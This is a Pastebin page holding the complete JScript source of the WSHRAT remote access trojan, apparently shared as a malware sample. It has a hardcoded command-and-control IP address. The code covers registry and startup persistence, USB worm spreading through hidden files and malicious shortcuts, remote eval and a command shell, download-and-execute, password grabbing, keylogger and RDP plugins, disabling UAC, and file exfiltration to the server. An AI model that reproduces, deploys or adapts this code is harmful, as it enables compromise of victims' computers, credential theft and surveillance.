API tools faq
paste
Racco42

wshrat

Racco42
Apr 24th, 2019
3,063
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.29 KB | None | 0 0
raw download clone embed print report
  1. function writeBytes(file, bytes) {
  2. try {
  3. var binaryStream = WScript.CreateObject("ADODB.Stream");
  4. binaryStream.Type = 1;
  5. binaryStream.Open();
  6. binaryStream.Write(bytes);
  7. binaryStream.SaveToFile(file, 2);
  8. } catch (err) {}
  9. }
  10.  
  11. function decodeBase64(base64) {
  12. var DM = WScript.CreateObject("Microsoft.XMLDOM");
  13. var EL = DM.createElement("tmp");
  14. EL.dataType = "bin.base64";
  15. EL.text = base64;
  16. return EL.nodeTypedValue;
  17. }
  18. wshShell1 = null;
  19. var host = "185.101.94.172";
  20. var port = 3018;
  21. var installdir = "%temp%";
  22. var lnkfile = true;
  23. var lnkfolder = true;
  24. var shellobj = WScript.createObject("wscript.shell");
  25. var filesystemobj = WScript.createObject("scripting.filesystemobject");
  26. var httpobj = WScript.createObject("msxml2.xmlhttp");
  27. var installname = WScript.scriptName;
  28. var startup = shellobj.specialFolders("startup") + "\\";
  29. installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
  30. if (!filesystemobj.folderExists(installdir)) {
  31. installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";
  32. }
  33. var spliter = "|";
  34. var sleep = 5000;
  35. var response, cmd, param, oneonce;
  36. var inf = "";
  37. var usbspreading = "";
  38. var startdate = "";
  39. instance();
  40. while (true) {
  41. try {
  42. install();
  43. response = "";
  44. response = post("is-ready", "");
  45. cmd = response.split(spliter);
  46. switch (cmd[0]) {
  47. case "disconnect":
  48. WScript.quit();
  49. break;
  50. case "reboot":
  51. shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);
  52. break;
  53. case "shutdown":
  54. shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);
  55. break;
  56. case "excecute":
  57. param = cmd[1];
  58. eval(param);
  59. break;
  60. case "get-pass":
  61. passgrabber(cmd[1], "cmdc.exe", cmd[2]);
  62. break;
  63. case "uninstall":
  64. uninstall();
  65. break;
  66. case "up-n-exec":
  67. download(cmd[1], cmd[2]);
  68. break;
  69. case "bring-log":
  70. upload(installdir + "wshlogs\\" + cmd[1], "take-log");
  71. break;
  72. case "down-n-exec":
  73. sitedownloader(cmd[1], cmd[2]);
  74. break;
  75. case "filemanager":
  76. servicestarter(cmd[1], "fm-plugin.exe", information());
  77. break;
  78. case "rdp":
  79. servicestarter(cmd[1], "rd-plugin.exe", information());
  80. break;
  81. case "keylogger":
  82. keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);
  83. break;
  84. case "offline-keylogger":
  85. keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);
  86. break;
  87. case "browse-logs":
  88. post("is-logs", enumfaf(installdir + "wshlogs"));
  89. break;
  90. case "cmd-shell":
  91. param = cmd[1];
  92. post("is-cmd-shell", cmdshell(param));
  93. break;
  94. case "get-processes":
  95. post("is-processes", enumprocess());
  96. break;
  97. case "disable-uac":
  98. if (WScript.Arguments.Named.Exists("elevated") == true) {
  99. var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
  100. oReg.SetDwordValue(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "EnableLUA", 0);
  101. oReg.SetDwordValue(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "ConsentPromptBehaviorAdmin", 0);
  102. oReg = null;
  103. updatestatus("UAC+Disabled+(Reboot+Required)");
  104. }
  105. break;
  106. case "elevate":
  107. if (WScript.Arguments.Named.Exists("elevated") == false) {
  108. try {
  109. oneonce.close();
  110. oneonce = null;
  111. WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
  112. updatestatus("Client+Elevated");
  113. } catch (nn) {}
  114. WScript.quit();
  115. } else {
  116. updatestatus("Client+Elevated");
  117. }
  118. break;
  119. case "if-elevate":
  120. if (WScript.Arguments.Named.Exists("elevated") == false) {
  121. updatestatus("Client+Not+Elevated");
  122. } else {
  123. updatestatus("Client+Elevated");
  124. }
  125. break;
  126. case "kill-process":
  127. exitprocess(cmd[1]);
  128. break;
  129. case "sleep":
  130. param = cmd[1];
  131. sleep = eval(param);
  132. break;
  133. }
  134. } catch (er) {}
  135. WScript.sleep(sleep);
  136. }
  137.  
  138. function install() {
  139. var lnkobj;
  140. var filename;
  141. var foldername;
  142. var fileicon;
  143. var foldericon;
  144. upstart();
  145. for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
  146. var drive = dri.item();
  147. if (drive.isready == true) {
  148. if (drive.freespace > 0) {
  149. if (drive.drivetype == 1) {
  150. try {
  151. filesystemobj.copyFile(WScript.scriptFullName, drive.path + "\\" + installname, true);
  152. if (filesystemobj.fileExists(drive.path + "\\" + installname)) {
  153. filesystemobj.getFile(drive.path + "\\" + installname).attributes = 2 + 4;
  154. }
  155. } catch (eiju) {}
  156. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()) {
  157. try {
  158. var file = fi.item();
  159. if (lnkfile == false) {
  160. break;
  161. }
  162. if (file.name.indexOf(".")) {
  163. if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
  164. file.attributes = 2 + 4;
  165. if (file.name.toUpperCase() != installname.toUpperCase()) {
  166. filename = file.name.split(".");
  167. lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] + ".lnk");
  168. lnkobj.windowStyle = 7;
  169. lnkobj.targetPath = "cmd.exe";
  170. lnkobj.workingDirectory = "";
  171. lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start " + file.name.replace(new RegExp(" ", "g"), "\" \"") +
  172. "&exit";
  173. try {
  174. fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.s
  175. plit(".")[file.name.split(".").length - 1] + "\\") + "\\defaulticon\\");
  176. } catch (eeee) {}
  177. if (fileicon.indexOf(",") == 0) {
  178. lnkobj.iconLocation = file.path;
  179. } else {
  180. lnkobj.iconLocation = fileicon;
  181. }
  182. lnkobj.save();
  183. }
  184. }
  185. }
  186. } catch (err) {}
  187. }
  188. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()) {
  189. try {
  190. var folder = fi.item();
  191. if (lnkfolder == false) {
  192. break;
  193. }
  194. folder.attributes = 2 + 4;
  195. foldername = folder.name;
  196. lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
  197. lnkobj.windowStyle = 7;
  198. lnkobj.targetPath = "cmd.exe";
  199. lnkobj.workingDirectory = "";
  200. lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "\" \"") + "
  201. &exit";
  202. foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
  203. if (foldericon.indexOf(",") == 0) {
  204. lnkobj.iconLocation = folder.path;
  205. } else {
  206. lnkobj.iconLocation = foldericon;
  207. }
  208. lnkobj.save();
  209. } catch (err) {}
  210. }
  211. }
  212. }
  213. }
  214. }
  215. }
  216.  
  217. function uninstall() {
  218. try {
  219. var filename;
  220. var foldername;
  221. try {
  222. shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
  223. shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
  224. } catch (ei) {}
  225. try {
  226. filesystemobj.deleteFile(startup + installname, true);
  227. filesystemobj.deleteFile(wscript.scriptfullname, true);
  228. } catch (eej) {}
  229. for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
  230. var drive = dri.item();
  231. if (drive.isready == true) {
  232. if (drive.freespace > 0) {
  233. if (drive.drivetype == 1) {
  234. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()) {
  235. var file = fi.item();
  236. try {
  237. if (file.name.indexOf(".")) {
  238. if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
  239. file.attributes = 0;
  240. if (file.name.toUpperCase() != installname.toUpperCase()) {
  241. filename = file.name.split(".");
  242. filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk");
  243. } else {
  244. filesystemobj.deleteFile(drive.path + "\\" + file.name);
  245. }
  246. } else {
  247. filesystemobj.deleteFile(file.path);
  248. }
  249. }
  250. } catch (ex) {}
  251. }
  252. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()) {
  253. var folder = fi.item();
  254. folder.attributes = 0;
  255. }
  256. }
  257. }
  258. }
  259. }
  260. } catch (err) {}
  261. WScript.quit();
  262. }
  263.  
  264. function post(cmd, param) {
  265. try {
  266. httpobj.open("post", "http://" + host + ":" + port + "/" + cmd, false);
  267. httpobj.setRequestHeader("user-agent:", information());
  268. httpobj.send(param);
  269. return httpobj.responseText;
  270. } catch (err) {
  271. return "";
  272. }
  273. }
  274.  
  275. function information() {
  276. try {
  277. if (inf == "") {
  278. inf = hwid() + spliter;
  279. inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter;
  280. inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
  281. var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
  282. var os = root.ExecQuery("select * from win32_operatingsystem");
  283. for (var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()) {
  284. var osinfo = fi.item();
  285. inf = inf + osinfo.caption + spliter;
  286. break;
  287. }
  288. inf = inf + "plus" + spliter;
  289. inf = inf + security() + spliter;
  290. inf = inf + usbspreading;
  291. inf = "WSHRAT" + spliter + inf + spliter + "JavaScript";
  292. return inf;
  293. } else {
  294. return inf;
  295. }
  296. } catch (err) {
  297. return "";
  298. }
  299. }
  300.  
  301. function upstart() {
  302. try {
  303. try {
  304. shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"", "
  305. REG_SZ");
  306. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"",
  307. "REG_SZ");
  308. } catch (ei) {}
  309. filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
  310. filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
  311. } catch (err) {}
  312. }
  313.  
  314. function hwid() {
  315. try {
  316. var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
  317. var disks = root.ExecQuery("select * from win32_logicaldisk");
  318. for (var fi = new Enumerator(disks); !fi.atEnd(); fi.moveNext()) {
  319. var disk = fi.item();
  320. if (disk.volumeSerialNumber != "") {
  321. return disk.volumeSerialNumber;
  322. break;
  323. }
  324. }
  325. } catch (err) {
  326. return "";
  327. }
  328. }
  329.  
  330. function security() {
  331. try {
  332. var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
  333. var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem", null, 48);
  334. var versionstr, osversion;
  335. for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
  336. var objitem = fi.item();
  337. versionstr = objitem.version.toString().split(".");
  338. }
  339. osversion = versionstr[0] + ".";
  340. for (var x = 1; x < versionstr.length; x++) {
  341. osversion = osversion + versionstr[0];
  342. }
  343. osversion = eval(osversion);
  344. var sc;
  345. if (osversion > 6) {
  346. sc = "securitycenter2";
  347. } else {
  348. sc = "securitycenter";
  349. }
  350. var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
  351. var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
  352. var secu = "";
  353. for (var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()) {
  354. var objantivirus = fi.item();
  355. secu = secu + objantivirus.displayName + " .";
  356. }
  357. if (secu == "") {
  358. secu = "nan-av";
  359. }
  360. return secu;
  361. } catch (err) {}
  362. }
  363.  
  364. function getDate() {
  365. var s = "";
  366. var d = new Date();
  367. s += d.getDate() + "/";
  368. s += (d.getMonth() + 1) + "/";
  369. s += d.getYear();
  370. return s;
  371. }
  372.  
  373. function instance() {
  374. try {
  375. try {
  376. usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");
  377. } catch (eee) {}
  378. if (usbspreading == "") {
  379. if (WScript.scriptFullName.substr(1).toLowerCase() == ":\\" + installname.toLowerCase()) {
  380. usbspreading = "true - " + getDate();
  381. try {
  382. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");
  383. } catch (eeeee) {}
  384. } else {
  385. usbspreading = "false - " + getDate();
  386. try {
  387. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");
  388. } catch (eeeee) {}
  389. }
  390. }
  391. upstart();
  392. var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
  393. var installfullnameshort = filesystemobj.getFile(installdir + installname);
  394. if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()) {
  395. shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
  396. WScript.quit();
  397. }
  398. var oneonce = filesystemobj.openTextFile(installdir + installname, 8, false);
  399. } catch (err) {
  400. WScript.quit();
  401. }
  402. }
  403.  
  404. function passgrabber(fileurl, filename, retcmd) {
  405. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  406. try {
  407. filesystemobj.deleteFile(installdir + filename + "data");
  408. } catch (ey) {}
  409. var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
  410. var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF
  411. FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00\nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA
  412. 00 08 00\nSort=0";
  413. var writer = filesystemobj.openTextFile(config_file, 2, true);
  414. writer.writeLine(cfg);
  415. writer.close();
  416. writer = null;
  417. var strlink = fileurl;
  418. var strsaveto = installdir + filename;
  419. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  420. objhttpdownload.open("get", strlink, false);
  421. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  422. objhttpdownload.send();
  423. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  424. if (objfsodownload.fileExists(strsaveto)) {
  425. objfsodownload.deleteFile(strsaveto);
  426. }
  427. if (objhttpdownload.status == 200) {
  428. var objstreamdownload = WScript.CreateObject("adodb.stream");
  429. objstreamdownload.Type = 1;
  430. objstreamdownload.Open();
  431. objstreamdownload.Write(objhttpdownload.responseBody);
  432. objstreamdownload.SaveToFile(strsaveto);
  433. objstreamdownload.close();
  434. objstreamdownload = null;
  435. }
  436. if (objfsodownload.fileExists(strsaveto)) {
  437. var runner = WScript.CreateObject("Shell.Application");
  438. var saver = objfsodownload.getFile(strsaveto).shortPath
  439. runner.shellExecute(saver, " /stext " + saver + "data");
  440. WScript.sleep(2000);
  441. deletefaf(strsaveto);
  442. upload(saver + "data", retcmd);
  443. }
  444. }
  445.  
  446. function keyloggerstarter(fileurl, filename, filearg, is_offline) {
  447. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  448. var strlink = fileurl;
  449. var strsaveto = installdir + filename;
  450. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  451. objhttpdownload.open("get", strlink, false);
  452. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  453. objhttpdownload.send();
  454. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  455. if (objfsodownload.fileExists(strsaveto)) {
  456. objfsodownload.deleteFile(strsaveto);
  457. }
  458. if (objhttpdownload.status == 200) {
  459. var objstreamdownload = WScript.CreateObject("adodb.stream");
  460. objstreamdownload.Type = 1;
  461. objstreamdownload.Open();
  462. objstreamdownload.Write(objhttpdownload.responseBody);
  463. objstreamdownload.SaveToFile(strsaveto);
  464. objstreamdownload.close();
  465. objstreamdownload = null;
  466. }
  467. if (objfsodownload.fileExists(strsaveto)) {
  468. shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\" " + is_offline);
  469. }
  470. }
  471.  
  472. function servicestarter(fileurl, filename, filearg) {
  473. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  474. var strlink = fileurl;
  475. var strsaveto = installdir + filename;
  476. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  477. objhttpdownload.open("get", strlink, false);
  478. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  479. objhttpdownload.send();
  480. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  481. if (objfsodownload.fileExists(strsaveto)) {
  482. objfsodownload.deleteFile(strsaveto);
  483. }
  484. if (objhttpdownload.status == 200) {
  485. var objstreamdownload = WScript.CreateObject("adodb.stream");
  486. objstreamdownload.Type = 1;
  487. objstreamdownload.Open();
  488. objstreamdownload.Write(objhttpdownload.responseBody);
  489. objstreamdownload.SaveToFile(strsaveto);
  490. objstreamdownload.close();
  491. objstreamdownload = null;
  492. }
  493. if (objfsodownload.fileExists(strsaveto)) {
  494. shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\"");
  495. }
  496. }
  497.  
  498. function sitedownloader(fileurl, filename) {
  499. var strlink = fileurl;
  500. var strsaveto = installdir + filename;
  501. var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
  502. objhttpdownload.open("get", strlink, false);
  503. objhttpdownload.setRequestHeader("cache-control", "max-age=0");
  504. objhttpdownload.send();
  505. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  506. if (objfsodownload.fileExists(strsaveto)) {
  507. objfsodownload.deleteFile(strsaveto);
  508. }
  509. if (objhttpdownload.status == 200) {
  510. var objstreamdownload = WScript.CreateObject("adodb.stream");
  511. objstreamdownload.Type = 1;
  512. objstreamdownload.Open();
  513. objstreamdownload.Write(objhttpdownload.responseBody);
  514. objstreamdownload.SaveToFile(strsaveto);
  515. objstreamdownload.close();
  516. objstreamdownload = null;
  517. }
  518. if (objfsodownload.fileExists(strsaveto)) {
  519. shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
  520. updatestatus("Executed+File");
  521. }
  522. }
  523.  
  524. function download(fileurl, filedir) {
  525. if (filedir == "") {
  526. filedir = installdir;
  527. }
  528. strsaveto = filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
  529. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  530. objhttpdownload.open("post", "http://" + host + ":" + port + "/" + "send-to-me" + spliter + fileurl, false);
  531. objhttpdownload.setRequestHeader("user-agent:", information());
  532. objhttpdownload.send("");
  533. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  534. if (objfsodownload.fileExists(strsaveto)) {
  535. objfsodownload.deleteFile(strsaveto);
  536. }
  537. if (objhttpdownload.status == 200) {
  538. var objstreamdownload = WScript.CreateObject("adodb.stream");
  539. objstreamdownload.Type = 1;
  540. objstreamdownload.Open();
  541. objstreamdownload.Write(objhttpdownload.responseBody);
  542. objstreamdownload.SaveToFile(strsaveto);
  543. objstreamdownload.close();
  544. objstreamdownload = null;
  545. }
  546. if (objfsodownload.fileExists(strsaveto)) {
  547. shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
  548. updatestatus("Executed+File");
  549. }
  550. }
  551.  
  552. function updatestatus(status_msg) {
  553. var objsoc = WScript.CreateObject("msxml2.xmlhttp");
  554. objsoc.open("post", "http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
  555. objsoc.setRequestHeader("user-agent:", information());
  556. objsoc.send("");
  557. }
  558.  
  559. function upload(fileurl, retcmd) {
  560. var httpobj, objstreamuploade, buffer;
  561. var objstreamuploade = WScript.CreateObject("adodb.stream");
  562. objstreamuploade.Type = 1;
  563. objstreamuploade.Open();
  564. objstreamuploade.loadFromFile(fileurl);
  565. buffer = objstreamuploade.Read();
  566. objstreamuploade.close();
  567. objstreamdownload = null;
  568. var httpobj = WScript.CreateObject("msxml2.xmlhttp");
  569. httpobj.open("post", "http://" + host + ":" + port + "/" + retcmd, false);
  570. httpobj.setRequestHeader("user-agent:", information());
  571. httpobj.send(buffer);
  572. }
  573.  
  574. function deletefaf(url) {
  575. try {
  576. filesystemobj.deleteFile(url);
  577. filesystemobj.deleteFolder(url);
  578. } catch (err) {}
  579. }
  580.  
  581. function cmdshell(cmd) {
  582. var httpobj, oexec, readallfromany;
  583. var strsaveto = installdir + "out.txt";
  584. shellobj.run("%comspec% /c " + cmd + " > \"" + strsaveto + "\"", 0, true);
  585. readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
  586. try {
  587. filesystemobj.deleteFile(strsaveto);
  588. } catch (ee) {}
  589. return readallfromany;
  590. }
  591.  
  592. function enumprocess() {
  593. var ep = "";
  594. try {
  595. var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
  596. var colitems = objwmiservice.ExecQuery("select * from win32_process", null, 48);
  597. for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
  598. var objitem = fi.item();
  599. ep = ep + objitem.name + "^";
  600. ep = ep + objitem.processId + "^";
  601. ep = ep + objitem.executablePath + spliter;
  602. }
  603. } catch (er) {}
  604. return ep;
  605. }
  606.  
  607. function exitprocess(pid) {
  608. try {
  609. shellobj.run("taskkill /F /T /PID " + pid, 0, true);
  610. } catch (err) {}
  611. }
  612.  
  613. function getParentDirectory(path) {
  614. var fo = filesystemobj.getFile(path);
  615. return filesystemobj.getParentFolderName(fo);
  616. }
  617.  
  618. function enumfaf(enumdir) {
  619. var re = "";
  620. try {
  621. for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).subfolders); !fi.atEnd(); fi.moveNext()) {
  622. var folder = fi.item();
  623. re = re + folder.name + "^^d^" + folder.attributes + spliter;
  624. }
  625. for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).files); !fi.atEnd(); fi.moveNext()) {
  626. var file = fi.item();
  627. re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
  628. }
  629. } catch (err) {}
  630. return re;
  631. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!